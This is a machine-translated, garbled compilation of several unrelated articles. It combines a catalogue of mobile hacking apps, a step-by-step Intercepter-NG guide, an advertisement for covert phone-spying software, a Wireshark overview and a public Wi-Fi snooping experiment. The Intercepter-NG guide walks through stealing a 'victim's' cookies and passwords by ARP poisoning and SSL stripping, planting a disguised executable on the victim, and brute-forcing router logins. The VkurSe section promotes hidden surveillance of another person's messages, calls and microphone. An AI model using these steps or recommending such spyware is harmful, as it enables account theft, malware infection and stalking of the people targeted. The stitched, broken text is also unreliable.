“A smartphone with hacking tools? There is no such thing,” we would have told you just recently. It was possible to launch the usual tools for implementing attacks only on some Maemo. Now many tools have been ported to iOS and Android, and some hack-tools have been specially written for the mobile environment. Can a smartphone replace a laptop in penetration tests? We decided to check it out.
Android is a popular platform not only for mere mortals, but also for the right people. The number of useful utilities here is simply off the charts. For this we can thank the UNIX roots of the system, which greatly simplified the porting of many tools to Android. Unfortunately, Google does not allow some of them into the Play Store, so you will have to install the corresponding APK manually. Also, some utilities require maximum access to the system (for example, the iptables firewall), so you should take care of root access in advance.
Each manufacturer uses its own technology here, but find necessary instructions simple enough. A good set of HOWTOs was put together by the LifeHacker resource (bit.ly/eWgDlu). However, if you couldn’t find a model here, the XDA-Developers forum (www.xda-developers.com) always comes to the rescue, where you can find various information on virtually any model of Android phone. One way or another, some of the utilities described below will work without root access. So, we present to you hacking utilities for Android.
Package Manager:
Let's start the review with an unusual package manager. The developers call it “utilities for superusers,” and this is not far from the truth. After installing BotBrew, you get a repository from where you can download a huge number of familiar tools compiled for Android. Among them: Python and Ruby interpreters for running numerous tools that are written in them, a tcpdump sniffer and an Nmap scanner for network analysis, Git and Subversion for working with version control systems, and much more.
Network scanners:
An inconspicuous smartphone, which, unlike a laptop, fits easily into a pocket and never raises suspicion, can be useful for network exploration. We have already said above how you can install Nmap, but there is another option. PIPS is a port of the Nmap scanner specifically adapted for Android, albeit an unofficial one. This means you can quickly find active devices on the network, determine their OS using fingerprinting options, perform a port scan - in short, do everything that Nmap is capable of.
l
There are two problems with using Nmap, despite all its power. Firstly, the parameters for scanning are transmitted through launch keys, which you must not only know, but also be able to enter using an inconvenient mobile keyboard. And secondly, the scanning results in the console output are not as clear as we would like. The Fing scanner does not have these shortcomings; it very quickly scans the network, does fingerprinting, and then displays in a clear form a list of all available devices, dividing them by type (router, desktop, iPhone, and so on). At the same time, for each host you can quickly view a list of open ports. Moreover, right from here you can connect, say, to FTP, using the FTP client installed in the system - very convenient.
When it comes to analyzing a specific host, the NetAudit utility can be indispensable. It works on any Android device (even non-rooted) and allows you not only to quickly identify devices on the network, but also to examine them using a large fingerprinting database to identify operating system, as well as CMS systems used on the web server. There are now more than 3,000 digital fingerprints in the database.
If, on the contrary, you need to work at a lower level and carefully examine the operation of the network, then you cannot do without Net Tools. It is indispensable at work system administrator a set of utilities that allows you to fully diagnose the operation of the network to which the device is connected. The package contains more than 15 different types of programs, such as ping, traceroute, arp, dns, netstat, route.
Wi-fi monitor mode in android:
All WiFi modules have a special monitor mode. This mode can also be used for sniffing, intercepting and cracking passwords. However, in Android devices, due to hardware limitations, access to this mode is closed. The fact is that in most Android smartphones the same ones from Broadcom are used - these are bcm4329 or bcm4330, which do not work in a completely standard way.
The website contains instructions for activating monitor mode on Nexus One (Cyanogen 7) and GS2 (Cyanogen 9). Ready-made packages can be downloaded.
To run the code on other devices, you need to download the source code yourself and compile the package.
TRAFFIC MANIPULATIONS:
The tcpdump-based sniffer honestly logs all data into a pcap file, which can then be studied using familiar utilities like Wireshark or Network Miner. Since no capabilities for MITM attacks are implemented in it, it is rather a tool for analyzing your traffic. For example, this is a great way to study what programs installed on your device from dubious repositories convey.
If we talk about combat applications for Android, then one of the most sensational is FaceNiff, which implements interception and injection into intercepted web sessions. By downloading the APK package with the program, you can run this hack tool on almost any Android smartphone and, by connecting to a wireless network, intercept accounts of a variety of services: Facebook, Twitter, VKontakte, and so on - more than ten in total. Session hijacking is carried out using the ARP spoofing attack, but the attack is only possible on unprotected connections(FaceNiff does not know how to wedge into SSL traffic). To curb the flow of scriptdis, the author limited maximum number three sessions.
l
If the creator of FaceNiff wants money for using it, then DroidSheep is a completely free tool with the same functionality. True, you won’t find the distribution kit on the official website (this is due to Germany’s harsh laws regarding security utilities), but it can be found on the Internet without any problems. The main task of the utility is to intercept user web sessions of popular social networks, implemented using the same ARP Spoofing. But there’s a problem with secure connections: like FaceNiff, DroidSheep flatly refuses to work with the HTTPS protocol.
This utility also demonstrates the insecurity of open wireless networks, but on a slightly different plane. It does not intercept user sessions, but allows HTTP traffic to pass through itself using a spoofing attack, performing specified manipulations with it. Starting from the usual pranks (replacing all the pictures on the site with trollfaces, flipping all the images or, say, replacing Google results) and ending with phishing attacks, when the user is given fake pages of such popular services as facebook.com, linkedin.com, vkontakte.ru and many others.
If you ask which hack utility for Android is the most powerful, then Anti probably has no competitors. This is a real hacker combine. The main task of the program is to scan the network perimeter. Next, various modules enter the battle, with the help of which a whole arsenal is implemented: eavesdropping on traffic, carrying out MITM attacks, and exploiting found vulnerabilities. True, there are also disadvantages. The first thing that catches your eye is that the exploitation of vulnerabilities is carried out only from the central program server, which is located on the Internet, as a result of which targets that do not have an external IP address can be forgotten.
TRAFFIC TUNNELING:
Okay, but how can you ensure the security of your data that is transmitted over an open wireless network? In addition to VPN, which Android supports out of the box, you can create an SSH tunnel. For this purpose, there is a wonderful SSH Tunnel utility, which allows you to route the traffic of selected applications or the entire system as a whole through a remote SSH server.
It is often necessary to send traffic through a proxy or SOX, and in this case ProxyDroid will help out. It's simple: you choose which application traffic you want to tunnel, and specify a proxy (HTTP/HTTPS/SOCKS4/SOCKS5 are supported). If authorization is required, ProxyDroid also supports this. By the way, the configuration can be bound to a specific wireless network by doing different settings for each of them.
WIRELESS NETWORK:
The built-in wireless network manager is not very informative. If you need to quickly get a complete picture of nearby access points, then the Wifi Analyzer utility is an excellent choice. It will not only show all nearby access points, but will also display the channel on which they operate, their MAC address and, most importantly, the type of encryption used (having seen the coveted letters “WEP”, we can assume that access to the secure network is provided ). In addition, the utility is ideal if you need to find where the desired access point is physically located, thanks to a visual signal strength indicator.
This utility, as its developer states, can be useful when the wireless network is filled to capacity with clients, and it is at this moment that a good connection and stable connection is needed. WiFiKill allows you to disconnect clients from the Internet either selectively or based on a specific criterion (for example, it is possible to make fun of all the Yabloko members). The program simply performs an ARP spoofing attack and redirects all clients to themselves. This algorithm is stupidly simply implemented on the basis of iptables. This is the control panel for fast food wireless networks.
WEB APPLICATION AUDIT:
Manipulating HTTP requests from a computer is a piece of cake; there are a huge number of utilities and browser plugins for this. In the case of a smartphone, everything is a little more complicated. HTTP Query Builder will help you send a custom HTTP request with the parameters you need, for example, the desired cookie or a changed User-Agent. The result of the request will be displayed in a standard browser.
If the site is password protected using Basic Access Authentication, then you can check its reliability using the Router Brute Force ADS 2 utility. Initially, the utility was created to brute force passwords on the router admin panel, but it is clear that it can be used against any other resource with similar protection . The utility works, but is clearly crude. For example, the developer does not provide brute force, but only brute force using the dictionary is possible.
Surely you have heard about such a program for disabling web servers as Slowloris. The principle of its operation is to create and hold the maximum number of connections with a remote web server, thus preventing new clients from connecting to it. So, AnDOSid is an analogue of Slowloris right in your Android device! It's sad, but two hundred connections are often enough to provide unstable work every fourth website on Apache.
VARIOUS USES:
When working with many web applications and analyzing their logic, it is quite common to encounter data transmitted in encoded form, namely Base64. Encode will help you decode this data and see what exactly is stored in it. Perhaps, by substituting quotes, encoding them back into Base64 and substituting them in the URL of the site you are researching, you will get the coveted database query error.
If needed hex editor, then it is also available for Android. With HexEditor you can edit any files, including system files, if you elevate the program's rights to superuser. An excellent replacement for a standard text editor, allowing you to easily find the desired piece of text and change it.
REMOTE ACCESS:
Once you have access to a remote host, you need to be able to use it. And for this we need clients. Let's start with SSH, where ConnectBot is already the de facto standard. In addition to a convenient interface, it provides the ability to organize secure tunnels via SSH connections.
A useful program that allows you to connect to a remote desktop via RDP or VNC services. I’m very glad that these are two clients in one; there is no need to use different tools for RDP and VNC.
Specially written for Android browser MIB, with which you can manage network devices using the SNMP protocol. It can be useful for developing an attack vector on various routers, because the standard community string (in other words, an access password) for management via SNMP has not yet been canceled.
IPHONE
The iOS platform is no less popular among security utility developers. But if in the case of Android rights While root was needed only for some applications, jailbreak is almost always required on Apple devices. Fortunately, even for latest firmware iDevices (5.1.1) already has a jailbreak tool. Together with full access You also get an alternative application manager, Cydia, which already contains many utilities.
OPERATING THE SYSTEM:
The first thing I want to start with is installing the terminal. For obvious reasons, it is not included in the standard delivery of the mobile OS, but we will need it to run console utilities, which we will discuss further. The best implementation of a terminal emulator is MobileTerminal - it supports multiple terminals at once, gestures for control (for example, for sending
Another, more complex option to gain access to the device's console is to install OpenSSH on it (this is done through Cydia) and connect to it locally through an SSH client. If you use the right client like iSSH, which has amazing touchscreen control, you can work with the local console and remote hosts from one place.
DATA INTERCEPTION:
Now that you have access to the console, you can try the utilities. Let's start with Pirni, the first full-fledged sniffer for iOS. Structurally limited Wi-Fi module, built into iDevices, cannot be switched to the promiscuous mode necessary for normal data interception. So for sniffing, classic ARP spoofing is used, with the help of which all traffic is passed through the device itself. The standard version of the utility is launched from the console, but there is a more advanced version - Pirni Pro, which boasts graphical interface. Moreover, it can parse HTTP traffic on the fly and even automatically pull out interesting data from there (for example, logins and passwords), using regular expressions, which are set in the settings.
The well-known sniffer Intercepter-NG has recently had a console version that works on iOS and Android. It already implements grabbing passwords transmitted over a variety of protocols, intercepting instant messenger messages, and also resurrecting files from traffic. At the same time, network scanning functions and high-quality ARP Poison are available. To work, you must first install the libpcap package via Cydia. All startup instructions boil down to setting the correct rights: chmod +x intercepter_ios. Next, if you run the sniffer without parameters, a clear interactive interface will appear.
It’s hard to believe, but this sophisticated tool for implementing MITM attacks was finally ported to iOS. After a colossal amount of work, it was possible to make a full-fledged mobile port. To save yourself from dancing with a tambourine around dependencies during self-compilation, it is better to install an already built package using Cydia, after adding heworm.altervista.org/cydia as a data source. The kit also includes the etterlog utility, which helps to extract various types of traffic from the collected dump. useful information(for example, FTP accounts).
WIRELESS NETWORK ANALYSIS:
In old iOS versions craftsmen ran aircrack and could break the WEP key, but we checked: the program does not work on new devices. Therefore, to study Wi-Fi, we will have to be content with only Wi-Fi scanners. WiFi Analyzer analyzes and displays information about all available 802.11 networks around you, including information about SSID, channels, vendors, MAC addresses and encryption types. With such a program it is easy to find the physical location of the point if you suddenly forget it, and, for example, look at the written WPS PIN required for connection.
NETWORK SCANNARS:
What program does any penetration tester use anywhere in the world, regardless of goals and objectives? Network scanner. And in the case of iOS, this will most likely be the most powerful Scany toolkit. Thanks to a set of built-in utilities, you can quickly get a detailed picture of network devices oh and, for example, open ports. In addition, the package includes network testing utilities such as ping, traceroute, nslookup.
However, many people prefer Fing. The scanner has quite simple and limited functionality, but it is quite enough for the first acquaintance with the network of, say, a cafeteria :). The results display information about available services on remote machines, MAC
addresses and names of hosts connected to the scanned network.
It would seem that everyone has forgotten about Nikto, but why? After all, you can easily install this web vulnerability scanner, written in a script language (namely Perl), via Cydia. This means that you can easily launch it on your jailbroken device from the terminal. Nikto will be happy to provide you with additional information on the tested web resource. In addition, you can add your own search signatures to its knowledge database with your own hands.
REMOTE CONTROL:
Many network devices (including expensive routers) are managed using the SNMP protocol. This utility allows you to scan subnets for available services SNMP with a pre-known community string value (in other words, standard passwords). Note that searching for SNMP services with standard community strings (public/private) in an attempt to gain access to device management is an integral part of any penetration test, along with
identification of the perimeter itself and identification of services.
Two utilities from the same manufacturer are designed to connect to a remote desktop via RDP protocols and VNC. Similar utilities in App Store There are many, but these are the ones that are especially convenient to use.
PASSWORD RESTORE:
The legendary program that helps millions of hackers around the world “remember” their password has been ported to iOS. Now you can search passwords for services such as HTTP, FTP, Telnet, SSH, SMB, VNC, SMTP, POP3 and many others directly from your iPhone. True, for a more effective attack, it is better to stock up on good brute force dictionaries.
Everyone knows firsthand the vulnerability of using standard passwords. PassMule is a kind of directory that contains all kinds of standard logins and passwords for network devices. They are conveniently organized by vendor name, product, and model, so finding the one you need won't be difficult.
EXPLOITATION OF VULNERABILITIES:
METASPLOIT
www.metasploit.com
It’s hard to imagine a more hacking utility than Metasploit, and that’s what concludes our review today. Metasploit is a package of various tools whose main task is to exploit vulnerabilities in software. Imagine: about 1000 reliable, proven and necessary exploits in the daily life of a pentester - right on your smartphone! With the help of such a tool you can really establish yourself in any network. Metasploit allows you not only to exploit gaps in server applications- tools are also available for attacks on client applications (for example, through the Browser Autopwn module, when a combat load is inserted into client traffic). Mobile version The toolkit does not exist, but you can install it on an Apple device standard package, using
Hello friends.
As promised, I continue about the Intercepter-ng program.
Today there will be a review in practice.
Warning: you should not change settings or mindlessly press settings. At best, it may simply not work or you will turn off Wi-Fi. I had a case where the router settings were reset. So don't think that everything is harmless.
And even with the same settings as mine, it doesn’t mean that everything will work smoothly. In any case, for serious cases you will have to study the operation of all protocols and modes.
Shall we get started?
Interception of cookies and passwords.
Let's start with the classic interception of passwords and cookies, in principle the process is the same as in the article, but I will rewrite it again, with clarifications.
By the way, antiviruses can often fire such things and prevent data interception via Wi-FI
If the victim is on an Android or IOS device, you can only be content with what the victim enters only in the browser (passwords, websites, cookies); if the victim is using a social client for VK, then problems arise, they simply stop working. IN latest version Intercepter NG can solve the problem by replacing the victim’s certificate. More on this later.
First, decide what you need to get from the victim? Maybe you need passwords for social networks, or maybe just for websites. Maybe the cookies are enough for you to log in as the victim and do something right away, or you need passwords for future saving. Do you need to further analyze the images viewed by the victim and some pages, or do you not need this rubbish? Do you know that the victim has already entered the site (already authorized upon transition) or will he just enter his data?
If there is no need to receive pictures from visited resources, parts of media files and see some sites saved in html file disable in Settings - Ressurection. This will slightly reduce the load on the router.
What can be activated in Settings - if you are connected via an ethernet cable, you need to activate Spoof Ip/mac. Also activate Cookie killer (helps reset cookies so that the victim can exit the site). Cookie killer is an SSL Strip Attack, so don’t forget to activate it.
It is also better if Promiscious mode is activated, which allows you to improve interception, but not all modules support it... Extreme mode can be done without it. With it, sometimes more ports are intercepted, but there is also extra information + load...
First, select the interface through which you are connected to the Internet and the type Wi-fi connections or Ethernet if connected via cable to the router.
In Scan Mode right click mouse over the empty field and click Smart scan. All devices on the network will be scanned; all that remains is to add the desired victims to Add nat. 
Or you can set any one IP, go to settings - expert mode and check the box for Auto ARP poison, in this case the program will add everyone who is connected and connect to the network.
All we have to do is switch to Nat mode.
Click configure mitms , here we will need SSL mitm and SSL strip.
SSL mitm allows you to intercept data, although many browsers also respond to it by warning the victim.
SSL Strip allows the victim to switch from the Https secure protocol to HTTP, as well as for the cookie killer to work.
We don’t need anything else, click start arp poison (radiation icon) and wait for the victim’s activity.
In the password mode section, right-click and Show coolies. Then you can right-click on the cookie and go to the full url.
By the way, if the victim is sitting in social networks there is a possibility that his active correspondence will appear in Messengers mode.
Http inject (slip a file to the victim).
Mmm, quite a sweet option.
You can slip it to the victim so that she downloads the file. We can only hope that the victim will launch the file. For plausibility, you can analyze which sites the victim visits and slip something like an update.
For example, if the victim is on VK, name the file vk.exe. Perhaps the victim will launch it, deciding that it is useful.
Let's get started.
Bruteforce mode.
Brute force and password guessing mode.
One of the ways to use it is to brute access to the router admin panel. Also some other protocols.
For Brutus you need
Enter the router IP into the Target server, telnet protocol, username - user name, in our case Admin.
At the bottom there is a button with a folder drawn on it, you click on it and open a list of passwords (in the folder with the program, misc/pwlist.txt there is a list of frequently used passwords, or you can use your own list).
After loading, press start (triangle) and go drink tea.
If there are matches (a password is selected), the program will stop.
You need to know the username. But if you want to access the router, try the standard one - admin.
How to produce brute.
Traffic changer (traffic substitution).
The function is more of a joke. You can change it so that the victim, when entering one site, goes to another that you enter.
In traffic mode, enter the request on the left, the result on the right, but with the same number of letters and symbols, otherwise it won’t work.
Example - on the left we will enter the query to be changed, on the right we will change test1 to test2. (check the box for Disable HTTP gzip).
After entering, press ADD and then OK.
Finally, a video on how to intercept data from iOS clients, because as you know, during a Mitm attack, their applications simply stop working.
I will soon make a video about what was written in the article.
It was Data interception via Wi-FI.
That's basically it. If you have anything to add, write, if you have something to correct, just write.
Until next time.
Interception programs for Android is a relatively new “invention” that is gaining popularity. Today, when technology, and in particular the Internet, has penetrated into all areas of our lives and the rule of good, modern tone has become the presence of several personal pages in in social networks, it is not surprising that people still want to be aware of the lives of others. Especially when it comes to your colleagues, acquaintances, bosses, loved ones and family.
Interception from Android is carried out less often than other “spy” exercises for the simple reason that it is not so easy to listen to someone else’s device. We need appropriate technical equipment, which only the special services have. But today, some craftsmen have gone further and offer the sophisticated public services for hacking accounts, online surveillance, and even in reality (detectives). But how effective is all this? You won't know until you see it in person...
Interception of messages: difficulties and reality
Interception messages With Android Today they are performed by all and sundry - both craftsmen and various services. Proposals to intercept calls, hack pages on networks, remote hacking There are a lot of devices, only they have different pitfalls - either the performer is unreliable (he may be a blackmailer), or he asks for money in advance (a pig in a poke, no less), and besides, the result may not be worth the costs and efforts that you put in. Is it another matter - special services. Looking ahead, let’s say that they cost money (not much), but they earn their money’s worth. But not all services are equally functional and effective.
The difficulty in intercepting messages is that not every program For interception data With android compatible with devices and has wide functionality. After all, communication is not limited to calls alone: people send more often SMS and messages in instant messengers, and dozens of them a day. So, you need a standing one program for android to intercept packets– SMS, calls, messages from instant messengers, preferably visited pages on the Internet ( interceptionhttp—requests for android will show frequently visited resources, which will help parents in monitoring their children).
And also take into account this technological nuance: if it is stated that the program can intercept any incoming and outgoing packets, then it must have support - a server paired with a service that will process a lot of messages, because simple smartphone and programs simply cannot be done.
ServiceVkurSe
VkurSe is a service and program of the same name for interception A packages android. Its functionality is superior to any other solution:
- intercept SMS from Android: incoming and outgoing messages, sending all messages in an archive to email;
- interception of VKontakte messages With android a: you can read all messages from instant messengers, including Viber, Whatsapp;
- intercept calls and SMS on Android: calls are recorded, archived and forwarded to you;
- android interceptionWiFi: you can use a keyword query to disable WiFi network access for the listening device;
- positioning of the listening device via GPS;
- record microphone remotely via request with keyword;
- changing the lock code via message;
- reboot, turn on and off the phone;
- snapshot front camera if the password is entered incorrectly;
- clearing phone memory via SMS;
- archiving of all phone actions through your personal account on the website;
- uploading all intercepted files to Google Drive.
This is only part of what the VkurSe service and program provides.
Interception Security
The biggest drawback of most programs for intercepting information from phones is that they can be easily detected. The program itself performs interception, archiving and forwarding of packets, which greatly loads RAM and the device being listened to and the phone for which the packages are intended. The tapped phone begins to constantly freeze, then turns on, then reboots, a lot of traffic is consumed and its owner immediately realizes that something is wrong. He looks at the task manager or even scans the phone on the PC and detects a spy. Another thing is the VkurSe program. Eg, interception of messagesWhatsapp for android requires sending a large package at once and from one phone to another it will take time. This is where VkurSe comes to the rescue, processing the request and sending only actual information to your personal account on the website. Android traffic interception falls on the shoulders of the entire service, which greatly facilitates monitoring of correspondence and calls, and plus - it does not overload the phone. InterceptionWhatsapp android is completed in a matter of minutes and you can already read all the correspondence in your email in the form of a report, or in your personal account.
As we said earlier, all interception and surveillance services operate strictly for a fee. But VkurSe made a small exception for the user: on the site in the download category there are versions for interception A sms With android for free– you can test the program and service within 7 days from the moment of registration, and then decide whether you want to continue using the service or not.
In conclusion, let’s say that VkurSe is a really working service and program For interception SMS on android and more, which gives 100% results. Of course, there is the issue of a small user fee, but the truth is always worth every penny spent on it.
The Wireshark program will be an excellent assistant for those users who need to perform a detailed analysis of network packets - traffic computer network. The sniffer easily interacts with such common protocols as netbios, fddi, nntp, icq, x25, dns, irc, nfs, http, tcp, ipv6 and many others. During analysis, it allows you to separate a network packet into the appropriate components, according to a specific protocol, and display readable information in numerical form on the screen.
supports a huge number of different formats of transmitted and received information, and is able to open files that are used by other utilities. The principle of operation is that the network card goes into broadcast mode and begins intercepting network packets that are in its visibility area. Can work as a program for intercepting wifi packets.
How to use wireshark
The program studies the contents of information packets that pass through the network. To launch and use the results of the sniffer’s work, you do not need any specific knowledge, you just need to open it in the “Start” menu or click on the icon on the desktop (launching it is no different from any other Windows programs). A special function of the utility allows it to capture information packets, carefully decrypt their contents and return them to the user for analysis.After launching wireshark, you will see the program's main menu on the screen, which is located at the top of the window. It is used to control the utility. If you need to load files that store data about packets caught in previous sessions, as well as save data about other packets caught in a new session, then you will need the "File" tab to do this.
To launch the network packet capture function, the user must click on the "Capture" icon, then find a special menu section called "Interfaces", with which you can open a separate "Wireshark Capture Interfaces" window, where all available network interfaces should be shown, through which will capture the necessary data packets. In the case when the program (sniffer) is able to detect only one suitable interface, it will display the entire important information about him.
The results of the utility are direct evidence that, even if users do not independently (in this moment time) transfer of any data, the exchange of information does not stop on the network. After all, the principle of operation local network is that to maintain it in operating mode, each of its elements (computer, switch and other devices) continuously exchange service information with each other, therefore such network tools are designed to intercept such packets.
There is also a version for Linux systems.
It should be noted that The sniffer is extremely useful for network administrators and services computer security, because the utility allows you to identify potentially unprotected network nodes - likely areas that can be attacked by hackers.
In addition to its direct purpose, Wireshark can be used as a tool for monitoring and further analyzing network traffic in order to organize an attack on unprotected areas of the network, because intercepted traffic can be used to achieve various goals.
Internet users are so careless that losing confidential data is as easy as shelling pears. The publication 42.tut conducted an experiment to show how many “holes” there are in public Wi-Fi networks. The conclusion is disappointing: anyone without special skills and knowledge can create a complete dossier about a person using only an open wireless network.
We installed several applications for the experiment. They differ in functionality, but their essence is the same - to collect everything that passes through the network to which the device is connected. None of the programs position themselves as “pirated”, “hacker” or illegal - they can be downloaded online without any problems. The experiment was conducted in a shopping center with free Wi-Fi.
Interception
We connect to Wi-Fi: there is no password, the name of the network contains the word “free”. We start scanning, one of the programs immediately finds 15 connections to the network. For everyone you can see the IP address, MAC address, for some - the name of the device manufacturer: Sony, Samsung, Apple, LG, HTC...
We find the “victim” laptop among the devices. We connect to it - data that passes through the network begins to appear on the screen. All information is structured by time; there is even a built-in viewer of intercepted data.
User identification
We continue to watch. An online game has clearly started on his partner’s laptop: program commands are constantly being sent to the network, information about the situation on the battlefield is being received. You can see the nicknames of your opponents, their game levels and much more.
A message arrives from “VKontakte”. In one of the detailed message specifications, we find that the user ID is visible in each of them. If you paste it into the browser, the account of the person who received the message will open.
At this time, the “victim” is writing a response to the message, and clearly has no idea that we are staring at the photos on his account. One of the social network applications gives a signal - we can listen to this sound in the player.
Passwords and messages
Photos and sounds are not all that can be “transferred” to the available Wi-Fi. For example, one of the programs has a separate tab to track correspondence on social networks and instant messengers. Messages are decrypted and sorted by time of sending.
Showing someone else's correspondence is beyond good and evil. But it works. As an illustration, here is part of the dialogue of the author of the text, caught by the tracking computer from the “victim” device.
Another program separately “stores” all cookies and user information, including passwords. Fortunately, in encrypted form, but it immediately offers to install a utility that will decrypt them.
conclusions
Almost any information can be lost over Wi-Fi. Many public networks do not provide any protection at all, and sometimes even a password. This means that anyone can intercept the traffic of colleagues, friends or strangers.
The most reliable way out of this situation is one: do not transmit any important information through public networks. For example, do not send phone numbers and passwords in messages and do not pay with a payment card outside the home. The risk of losing personal data is extremely high.
Loading...
